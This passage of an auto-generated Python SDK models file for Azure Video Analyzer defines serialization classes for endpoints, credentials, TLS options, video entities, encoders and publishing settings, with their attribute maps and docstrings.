last_modified_at: The timestamp of resource last modification (UTC). :type last_modified_at: ~datetime.datetime """ _attribute_map = { 'created_by': {'key': 'createdBy', 'type': 'str'}, 'created_by_type': {'key': 'createdByType', 'type': 'str'}, 'created_at': {'key': 'createdAt', 'type': 'iso-8601'}, 'last_modified_by': {'key': 'lastModifiedBy', 'type': 'str'}, 'last_modified_by_type': {'key': 'lastModifiedByType', 'type': 'str'}, 'last_modified_at': {'key': 'lastModifiedAt', 'type': 'iso-8601'}, } def __init__( self, **kwargs ): super(SystemData, self).__init__(**kwargs) self.created_by = kwargs.get('created_by', None) self.created_by_type = kwargs.get('created_by_type', None) self.created_at = kwargs.get('created_at', None) self.last_modified_by = kwargs.get('last_modified_by', None) self.last_modified_by_type = kwargs.get('last_modified_by_type', None) self.last_modified_at = kwargs.get('last_modified_at', None) class TimeSequenceBase(msrest.serialization.Model): """A sequence of datetime ranges as a string. You probably want to use the sub-classes and not this class directly. Known sub-classes are: VideoSequenceAbsoluteTimeMarkers. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers': 'VideoSequenceAbsoluteTimeMarkers'} } def __init__( self, **kwargs ): super(TimeSequenceBase, self).__init__(**kwargs) self.type = None # type: Optional[str] class TlsEndpoint(EndpointBase): """TLS endpoint describes an endpoint that the pipeline can connect to over TLS transport (data is encrypted in transit). All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param credentials: Required. Credentials to be presented to the endpoint. :type credentials: ~video_analyzer.models.CredentialsBase :param url: Required. The endpoint URL for Video Analyzer to connect to. :type url: str :param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint URL. This is an optional property, typically used when the endpoint is behind a firewall. :type tunnel: ~video_analyzer.models.TunnelBase :param trusted_certificates: List of trusted certificate authorities when authenticating a TLS connection. A null list designates that Azure Video Analyzer's list of trusted authorities should be used. :type trusted_certificates: ~video_analyzer.models.CertificateSource :param validation_options: Validation options to use when authenticating a TLS connection. By default, strict validation is used. :type validation_options: ~video_analyzer.models.TlsValidationOptions """ _validation = { 'type': {'required': True}, 'credentials': {'required': True}, 'url': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'credentials': {'key': 'credentials', 'type': 'CredentialsBase'}, 'url': {'key': 'url', 'type': 'str'}, 'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'}, 'trusted_certificates': {'key': 'trustedCertificates', 'type': 'CertificateSource'}, 'validation_options': {'key': 'validationOptions', 'type': 'TlsValidationOptions'}, } def __init__( self, **kwargs ): super(TlsEndpoint, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.TlsEndpoint' # type: str self.trusted_certificates = kwargs.get('trusted_certificates', None) self.validation_options = kwargs.get('validation_options', None) class TlsValidationOptions(msrest.serialization.Model): """Options for controlling the validation of TLS endpoints. :param ignore_hostname: When set to 'true' causes the certificate subject name validation to be skipped. Default is 'false'. :type ignore_hostname: str :param ignore_signature: When set to 'true' causes the certificate chain trust validation to be skipped. Default is 'false'. :type ignore_signature: str """ _attribute_map = { 'ignore_hostname': {'key': 'ignoreHostname', 'type': 'str'}, 'ignore_signature': {'key': 'ignoreSignature', 'type': 'str'}, } def __init__( self, **kwargs ): super(TlsValidationOptions, self).__init__(**kwargs) self.ignore_hostname = kwargs.get('ignore_hostname', None) self.ignore_signature = kwargs.get('ignore_signature', None) class TokenClaim(msrest.serialization.Model): """Properties for expected token claims. All required parameters must be populated in order to send to Azure. :param name: Required. Name of the claim which must be present on the token. :type name: str :param value: Required. Expected value of the claim to be present on the token. :type value: str """ _validation = { 'name': {'required': True}, 'value': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'value': {'key': 'value', 'type': 'str'}, } def __init__( self, **kwargs ): super(TokenClaim, self).__init__(**kwargs) self.name = kwargs['name'] self.value = kwargs['value'] class TrackedResource(Resource): """The resource model definition for an Azure Resource Manager tracked top level resource which has 'tags' and a 'location'. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param tags: A set of tags. Resource tags. :type tags: dict[str, str] :param location: Required. The geo-location where the resource lives. :type location: str """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'location': {'required': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'location': {'key': 'location', 'type': 'str'}, } def __init__( self, **kwargs ): super(TrackedResource, self).__init__(**kwargs) self.tags = kwargs.get('tags', None) self.location = kwargs['location'] class UnsecuredEndpoint(EndpointBase): """Unsecured endpoint describes an endpoint that the pipeline can connect to over clear transport (no encryption in transit). All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param credentials: Required. Credentials to be presented to the endpoint. :type credentials: ~video_analyzer.models.CredentialsBase :param url: Required. The endpoint URL for Video Analyzer to connect to. :type url: str :param tunnel: Describes the tunnel through which Video Analyzer can connect to the endpoint URL. This is an optional property, typically used when the endpoint is behind a firewall. :type tunnel: ~video_analyzer.models.TunnelBase """ _validation = { 'type': {'required': True}, 'credentials': {'required': True}, 'url': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'credentials': {'key': 'credentials', 'type': 'CredentialsBase'}, 'url': {'key': 'url', 'type': 'str'}, 'tunnel': {'key': 'tunnel', 'type': 'TunnelBase'}, } def __init__( self, **kwargs ): super(UnsecuredEndpoint, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.UnsecuredEndpoint' # type: str class UserAssignedManagedIdentity(msrest.serialization.Model): """The details of the user assigned managed identity used by the Video Analyzer resource. Variables are only populated by the server, and will be ignored when sending a request. :ivar client_id: The client ID. :vartype client_id: str :ivar principal_id: The principal ID. :vartype principal_id: str """ _validation = { 'client_id': {'readonly': True}, 'principal_id': {'readonly': True}, } _attribute_map = { 'client_id': {'key': 'clientId', 'type': 'str'}, 'principal_id': {'key': 'principalId', 'type': 'str'}, } def __init__( self, **kwargs ): super(UserAssignedManagedIdentity, self).__init__(**kwargs) self.client_id = None self.principal_id = None class UsernamePasswordCredentials(CredentialsBase): """Username and password credentials. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param username: Required. Username to be presented as part of the credentials. :type username: str :param password: Required. Password to be presented as part of the credentials. It is recommended that this value is parameterized as a secret string in order to prevent this value to be returned as part of the resource on API requests. :type password: str """ _validation = { 'type': {'required': True}, 'username': {'required': True}, 'password': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'username': {'key': 'username', 'type': 'str'}, 'password': {'key': 'password', 'type': 'str'}, } def __init__( self, **kwargs ): super(UsernamePasswordCredentials, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.UsernamePasswordCredentials' # type: str self.username = kwargs['username'] self.password = kwargs['password'] class VideoAnalyzer(TrackedResource): """The Video Analyzer account. Variables are only populated by the server, and will be ignored when sending a request. All required parameters must be populated in order to send to Azure. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param tags: A set of tags. Resource tags. :type tags: dict[str, str] :param location: Required. The geo-location where the resource lives. :type location: str :param identity: The identities associated to the Video Analyzer resource. :type identity: ~video_analyzer.models.VideoAnalyzerIdentity :param storage_accounts: The storage accounts for this resource. :type storage_accounts: list[~video_analyzer.models.StorageAccount] :ivar endpoints: The endpoints associated with this resource. :vartype endpoints: list[~video_analyzer.models.Endpoint] :param encryption: The account encryption properties. :type encryption: ~video_analyzer.models.AccountEncryption :param iot_hubs: The IoT Hubs for this resource. :type iot_hubs: list[~video_analyzer.models.IotHub] :param public_network_access: Whether or not public network access is allowed for resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled". :type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess :param network_access_control: Network access control for Video Analyzer. :type network_access_control: ~video_analyzer.models.NetworkAccessControl :ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values include: "Failed", "InProgress", "Succeeded". :vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState :ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer account. :vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection] """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'location': {'required': True}, 'endpoints': {'readonly': True}, 'provisioning_state': {'readonly': True}, 'private_endpoint_connections': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'location': {'key': 'location', 'type': 'str'}, 'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'}, 'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'}, 'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'}, 'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'}, 'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'}, 'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'}, 'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'}, } def __init__( self, **kwargs ): super(VideoAnalyzer, self).__init__(**kwargs) self.identity = kwargs.get('identity', None) self.storage_accounts = kwargs.get('storage_accounts', None) self.endpoints = None self.encryption = kwargs.get('encryption', None) self.iot_hubs = kwargs.get('iot_hubs', None) self.public_network_access = kwargs.get('public_network_access', None) self.network_access_control = kwargs.get('network_access_control', None) self.provisioning_state = None self.private_endpoint_connections = None class VideoAnalyzerCollection(msrest.serialization.Model): """A collection of VideoAnalyzer items. :param value: A collection of VideoAnalyzer items. :type value: list[~video_analyzer.models.VideoAnalyzer] """ _attribute_map = { 'value': {'key': 'value', 'type': '[VideoAnalyzer]'}, } def __init__( self, **kwargs ): super(VideoAnalyzerCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) class VideoAnalyzerIdentity(msrest.serialization.Model): """The managed identity for the Video Analyzer resource. All required parameters must be populated in order to send to Azure. :param type: Required. The identity type. :type type: str :param user_assigned_identities: The User Assigned Managed Identities. :type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity] """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': 'type', 'type': 'str'}, 'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'}, } def __init__( self, **kwargs ): super(VideoAnalyzerIdentity, self).__init__(**kwargs) self.type = kwargs['type'] self.user_assigned_identities = kwargs.get('user_assigned_identities', None) class VideoAnalyzerOperationStatus(msrest.serialization.Model): """Status of video analyzer operation. All required parameters must be populated in order to send to Azure. :param name: Required. Operation identifier. :type name: str :param id: Operation resource ID. :type id: str :param start_time: Operation start time. :type start_time: str :param end_time: Operation end time. :type end_time: str :param status: Operation status. :type status: str :param error: The error detail. :type error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'id': {'key': 'id', 'type': 'str'}, 'start_time': {'key': 'startTime', 'type': 'str'}, 'end_time': {'key': 'endTime', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(VideoAnalyzerOperationStatus, self).__init__(**kwargs) self.name = kwargs['name'] self.id = kwargs.get('id', None) self.start_time = kwargs.get('start_time', None) self.end_time = kwargs.get('end_time', None) self.status = kwargs.get('status', None) self.error = kwargs.get('error', None) class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model): """Status of private endpoint connection operation. All required parameters must be populated in order to send to Azure. :param name: Required. Operation identifier. :type name: str :param id: Operation resource ID. :type id: str :param start_time: Operation start time. :type start_time: str :param end_time: Operation end time. :type end_time: str :param status: Operation status. :type status: str :param error: The error detail. :type error: ~video_analyzer.models.ErrorDetail """ _validation = { 'name': {'required': True}, } _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'id': {'key': 'id', 'type': 'str'}, 'start_time': {'key': 'startTime', 'type': 'str'}, 'end_time': {'key': 'endTime', 'type': 'str'}, 'status': {'key': 'status', 'type': 'str'}, 'error': {'key': 'error', 'type': 'ErrorDetail'}, } def __init__( self, **kwargs ): super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs) self.name = kwargs['name'] self.id = kwargs.get('id', None) self.start_time = kwargs.get('start_time', None) self.end_time = kwargs.get('end_time', None) self.status = kwargs.get('status', None) self.error = kwargs.get('error', None) class VideoAnalyzerUpdate(msrest.serialization.Model): """The update operation for a Video Analyzer account. Variables are only populated by the server, and will be ignored when sending a request. :param tags: A set of tags. Resource tags. :type tags: dict[str, str] :param identity: The identities associated to the Video Analyzer resource. :type identity: ~video_analyzer.models.VideoAnalyzerIdentity :param storage_accounts: The storage accounts for this resource. :type storage_accounts: list[~video_analyzer.models.StorageAccount] :ivar endpoints: The endpoints associated with this resource. :vartype endpoints: list[~video_analyzer.models.Endpoint] :param encryption: The account encryption properties. :type encryption: ~video_analyzer.models.AccountEncryption :param iot_hubs: The IoT Hubs for this resource. :type iot_hubs: list[~video_analyzer.models.IotHub] :param public_network_access: Whether or not public network access is allowed for resources under the Video Analyzer account. Possible values include: "Enabled", "Disabled". :type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess :param network_access_control: Network access control for Video Analyzer. :type network_access_control: ~video_analyzer.models.NetworkAccessControl :ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values include: "Failed", "InProgress", "Succeeded". :vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState :ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer account. :vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection] """ _validation = { 'endpoints': {'readonly': True}, 'provisioning_state': {'readonly': True}, 'private_endpoint_connections': {'readonly': True}, } _attribute_map = { 'tags': {'key': 'tags', 'type': '{str}'}, 'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'}, 'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'}, 'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'}, 'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'}, 'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'}, 'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'}, 'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'}, } def __init__( self, **kwargs ): super(VideoAnalyzerUpdate, self).__init__(**kwargs) self.tags = kwargs.get('tags', None) self.identity = kwargs.get('identity', None) self.storage_accounts = kwargs.get('storage_accounts', None) self.endpoints = None self.encryption = kwargs.get('encryption', None) self.iot_hubs = kwargs.get('iot_hubs', None) self.public_network_access = kwargs.get('public_network_access', None) self.network_access_control = kwargs.get('network_access_control', None) self.provisioning_state = None self.private_endpoint_connections = None class VideoArchival(msrest.serialization.Model): """Video archival properties. :param retention_period: Video retention period indicates the maximum age of the video archive segments which are intended to be kept in storage. It must be provided in the ISO8601 duration format in the granularity of days, up to a maximum of 10 years. For example, if this is set to P30D (30 days), content older than 30 days will be periodically deleted. This value can be updated at any time and the new desired retention period will be effective within 24 hours. :type retention_period: str """ _attribute_map = { 'retention_period': {'key': 'retentionPeriod', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoArchival, self).__init__(**kwargs) self.retention_period = kwargs.get('retention_period', None) class VideoContentToken(msrest.serialization.Model): """"Video content token grants access to the video content URLs.". Variables are only populated by the server, and will be ignored when sending a request. :ivar expiration_date: The content token expiration date in ISO8601 format (eg. 2021-01-01T00:00:00Z). :vartype expiration_date: ~datetime.datetime :ivar token: The content token value to be added to the video content URL as the value for the "token" query string parameter. The token is specific to a single video. :vartype token: str """ _validation = { 'expiration_date': {'readonly': True}, 'token': {'readonly': True}, } _attribute_map = { 'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'}, 'token': {'key': 'token', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoContentToken, self).__init__(**kwargs) self.expiration_date = None self.token = None class VideoContentUrls(msrest.serialization.Model): """Set of URLs to the video content. :param download_url: Video file download URL. This URL can be used in conjunction with the video content authorization token to download the video MP4 file. The resulting MP4 file can be played on any standard media player. It is available when the video type is 'file' and video file is available for consumption. :type download_url: str :param archive_base_url: Video archive streaming base URL. The archived content can be automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in conjunction with the video content authorization token on any compatible DASH or HLS players by appending the following to the base URL: .. code-block:: - HLSv4: /manifest(format=m3u8-aapl).m3u8 - HLS CMAF: /manifest(format=m3u8-cmaf) - DASH CMAF: /manifest(format=mpd-time-cmaf) Moreover, an ongoing video recording can be played in "live mode" with latencies which are approximately double of the chosen video segment length. It is available when the video type is 'archive' and video archiving is enabled. :type archive_base_url: str :param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in conjunction with the video content authorization token to expose a WebSocket tunneled RTSP stream. It is available when the video type is 'archive' and a live, low-latency feed is available from the source. :type rtsp_tunnel_url: str :param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled. :type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls """ _attribute_map = { 'download_url': {'key': 'downloadUrl', 'type': 'str'}, 'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'}, 'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'}, 'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'}, } def __init__( self, **kwargs ): super(VideoContentUrls, self).__init__(**kwargs) self.download_url = kwargs.get('download_url', None) self.archive_base_url = kwargs.get('archive_base_url', None) self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None) self.preview_image_urls = kwargs.get('preview_image_urls', None) class VideoCreationProperties(msrest.serialization.Model): """Optional properties to be used in case a new video resource needs to be created on the service. These will not take effect if the video already exists. :param title: Optional title provided by the user. Value can be up to 256 characters long. :type title: str :param description: Optional description provided by the user. Value can be up to 2048 characters long. :type description: str :param segment_length: Segment length indicates the length of individual content files (segments) which are persisted to storage. Smaller segments provide lower archive playback latency but generate larger volume of storage transactions. Larger segments reduce the amount of storage transactions while increasing the archive playback latency. Value must be specified in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to 5 minutes, in 30 seconds increments. Changing this value after the initial call to create the video resource can lead to errors when uploading content to the archive. Default value is 30 seconds. This property is only allowed for topologies where "kind" is set to "live". :type segment_length: str :param retention_period: Video retention period indicates how long the video is kept in storage. Value must be specified in ISO8601 duration format (i.e. "P1D" equals 1 day) and can vary between 1 day to 10 years, in 1 day increments. When absent (null), all video content is retained indefinitely. This property is only allowed for topologies where "kind" is set to "live". :type retention_period: str """ _attribute_map = { 'title': {'key': 'title', 'type': 'str'}, 'description': {'key': 'description', 'type': 'str'}, 'segment_length': {'key': 'segmentLength', 'type': 'str'}, 'retention_period': {'key': 'retentionPeriod', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoCreationProperties, self).__init__(**kwargs) self.title = kwargs.get('title', None) self.description = kwargs.get('description', None) self.segment_length = kwargs.get('segment_length', None) self.retention_period = kwargs.get('retention_period', None) class VideoEncoderBase(msrest.serialization.Model): """Base type for all video encoding presets, which define the recipe or instructions on how the input video should be processed. You probably want to use the sub-classes and not this class directly. Known sub-classes are: VideoEncoderH264. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should be encoded. If omitted, encoder sets it automatically to try and match the quality of the input video. :type bitrate_kbps: str :param frame_rate: The frame rate (in frames per second) of the encoded video. The value must be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average frame rate of the input video. :type frame_rate: str :param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the resolution of the input video. :type scale: ~video_analyzer.models.VideoScale """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'}, 'frame_rate': {'key': 'frameRate', 'type': 'str'}, 'scale': {'key': 'scale', 'type': 'VideoScale'}, } _subtype_map = { 'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'} } def __init__( self, **kwargs ): super(VideoEncoderBase, self).__init__(**kwargs) self.type = None # type: Optional[str] self.bitrate_kbps = kwargs.get('bitrate_kbps', None) self.frame_rate = kwargs.get('frame_rate', None) self.scale = kwargs.get('scale', None) class VideoEncoderH264(VideoEncoderBase): """A custom preset for encoding video with the H.264 (AVC) codec. All required parameters must be populated in order to send to Azure. :param type: Required. The discriminator for derived types.Constant filled by server. :type type: str :param bitrate_kbps: The maximum bitrate, in kilobits per second or Kbps, at which video should be encoded. If omitted, encoder sets it automatically to try and match the quality of the input video. :type bitrate_kbps: str :param frame_rate: The frame rate (in frames per second) of the encoded video. The value must be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average frame rate of the input video. :type frame_rate: str :param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the resolution of the input video. :type scale: ~video_analyzer.models.VideoScale """ _validation = { 'type': {'required': True}, } _attribute_map = { 'type': {'key': '@type', 'type': 'str'}, 'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'}, 'frame_rate': {'key': 'frameRate', 'type': 'str'}, 'scale': {'key': 'scale', 'type': 'VideoScale'}, } def __init__( self, **kwargs ): super(VideoEncoderH264, self).__init__(**kwargs) self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str class VideoEntity(ProxyResource): """Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files. Variables are only populated by the server, and will be ignored when sending a request. :ivar id: Fully qualified resource ID for the resource. Ex - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}. :vartype id: str :ivar name: The name of the resource. :vartype name: str :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts". :vartype type: str :ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy information. :vartype system_data: ~video_analyzer.models.SystemData :param title: Optional video title provided by the user. Value can be up to 256 characters long. :type title: str :param description: Optional video description provided by the user. Value can be up to 2048 characters long. :type description: str :ivar type_properties_type: Video content type. Different content types are suitable for different applications and scenarios. Possible values include: "Archive", "File". :vartype type_properties_type: str or ~video_analyzer.models.VideoType :ivar flags: Video flags contain information about the available video actions and its dynamic properties based on the current video state. :vartype flags: ~video_analyzer.models.VideoFlags :ivar content_urls: Set of URLs to the video content. :vartype content_urls: ~video_analyzer.models.VideoContentUrls :param media_info: Contains information about the video and audio content. :type media_info: ~video_analyzer.models.VideoMediaInfo :param archival: Video archival properties. :type archival: ~video_analyzer.models.VideoArchival """ _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'system_data': {'readonly': True}, 'type_properties_type': {'readonly': True}, 'flags': {'readonly': True}, 'content_urls': {'readonly': True}, } _attribute_map = { 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'system_data': {'key': 'systemData', 'type': 'SystemData'}, 'title': {'key': 'properties.title', 'type': 'str'}, 'description': {'key': 'properties.description', 'type': 'str'}, 'type_properties_type': {'key': 'properties.type', 'type': 'str'}, 'flags': {'key': 'properties.flags', 'type': 'VideoFlags'}, 'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'}, 'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'}, 'archival': {'key': 'properties.archival', 'type': 'VideoArchival'}, } def __init__( self, **kwargs ): super(VideoEntity, self).__init__(**kwargs) self.title = kwargs.get('title', None) self.description = kwargs.get('description', None) self.type_properties_type = None self.flags = None self.content_urls = None self.media_info = kwargs.get('media_info', None) self.archival = kwargs.get('archival', None) class VideoEntityCollection(msrest.serialization.Model): """A collection of VideoEntity items. :param value: A collection of VideoEntity items. :type value: list[~video_analyzer.models.VideoEntity] :param next_link: A link to the next page of the collection (when the collection contains too many results to return in one response). :type next_link: str """ _attribute_map = { 'value': {'key': 'value', 'type': '[VideoEntity]'}, 'next_link': {'key': '@nextLink', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoEntityCollection, self).__init__(**kwargs) self.value = kwargs.get('value', None) self.next_link = kwargs.get('next_link', None) class VideoFlags(msrest.serialization.Model): """Video flags contain information about the available video actions and its dynamic properties based on the current video state. All required parameters must be populated in order to send to Azure. :param can_stream: Required. Value indicating whether or not the video can be streamed. Only "archive" type videos can be streamed. :type can_stream: bool :param has_data: Required. Value indicating whether or not there has ever been data recorded or uploaded into the video. Newly created videos have this value set to false. :type has_data: bool :param is_in_use: Required. Value indicating whether or not the video is currently being referenced be an active pipeline. The fact that is being referenced, doesn't necessarily indicate that data is being received. For example, video recording may be gated on events or camera may not be accessible at the time. :type is_in_use: bool """ _validation = { 'can_stream': {'required': True}, 'has_data': {'required': True}, 'is_in_use': {'required': True}, } _attribute_map = { 'can_stream': {'key': 'canStream', 'type': 'bool'}, 'has_data': {'key': 'hasData', 'type': 'bool'}, 'is_in_use': {'key': 'isInUse', 'type': 'bool'}, } def __init__( self, **kwargs ): super(VideoFlags, self).__init__(**kwargs) self.can_stream = kwargs['can_stream'] self.has_data = kwargs['has_data'] self.is_in_use = kwargs['is_in_use'] class VideoMediaInfo(msrest.serialization.Model): """Contains information about the video and audio content. :param segment_length: Video segment length indicates the length of individual video files (segments) which are persisted to storage. Smaller segments provide lower archive playback latency but generate larger volume of storage transactions. Larger segments reduce the amount of storage transactions while increasing the archive playback latency. Value must be specified in ISO8601 duration format (i.e. "PT30S" equals 30 seconds) and can vary between 30 seconds to 5 minutes, in 30 seconds increments. :type segment_length: str """ _attribute_map = { 'segment_length': {'key': 'segmentLength', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoMediaInfo, self).__init__(**kwargs) self.segment_length = kwargs.get('segment_length', None) class VideoPreviewImageUrls(msrest.serialization.Model): """Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled. :param small: Low resolution preview image URL. :type small: str :param medium: Medium resolution preview image URL. :type medium: str :param large: High resolution preview image URL. :type large: str """ _attribute_map = { 'small': {'key': 'small', 'type': 'str'}, 'medium': {'key': 'medium', 'type': 'str'}, 'large': {'key': 'large', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoPreviewImageUrls, self).__init__(**kwargs) self.small = kwargs.get('small', None) self.medium = kwargs.get('medium', None) self.large = kwargs.get('large', None) class VideoPublishingOptions(msrest.serialization.Model): """Optional flags used to change how video is published. These are only allowed for topologies where "kind" is set to "live". :param disable_archive: When set to 'true' content will not be archived or recorded. This is used, for example, when the topology is used only for low latency video streaming. Default is 'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'. :type disable_archive: str :param disable_rtsp_publishing: When set to 'true' the RTSP playback URL will not be published, disabling low latency streaming. This is used, for example, when the topology is used only for archiving content. Default is 'false'. If set to 'true', then "disableArchive" must be set to 'false'. :type disable_rtsp_publishing: str """ _attribute_map = { 'disable_archive': {'key': 'disableArchive', 'type': 'str'}, 'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'}, } def __init__( self, **kwargs ): super(VideoPublishingOptions, self).__init__(**kwargs) self.disable_archive = kwargs.get('disable_archive', None) self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None) class 